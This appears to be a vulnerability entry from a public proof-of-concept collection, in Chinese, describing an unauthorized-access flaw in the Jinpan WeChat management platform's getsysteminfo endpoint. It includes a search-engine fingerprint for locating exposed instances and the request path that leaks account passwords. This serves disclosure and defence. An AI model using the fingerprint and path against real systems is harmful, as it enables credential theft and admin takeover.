Awesome-POC/Web应用漏洞/金盘 微信管理平台 getsysteminfo 未授权访问漏洞.md

29 lines
599 B
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# 金盘 微信管理平台 getsysteminfo 未授权访问漏洞
## 漏洞描述
金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞攻击者通过漏洞可以获取账号密码信息获取后台管理员权限
## 漏洞影响
金盘 微信管理平台
## 网络测绘
```
title="微信管理后台" && icon_hash="116323821"
```
## 漏洞复现
登陆页面
![image-20230828162340318](images/image-20230828162340318.png)
验证POC
```
/admin/weichatcfg/getsysteminfo
```
![image-20230828162351977](images/image-20230828162351977.png)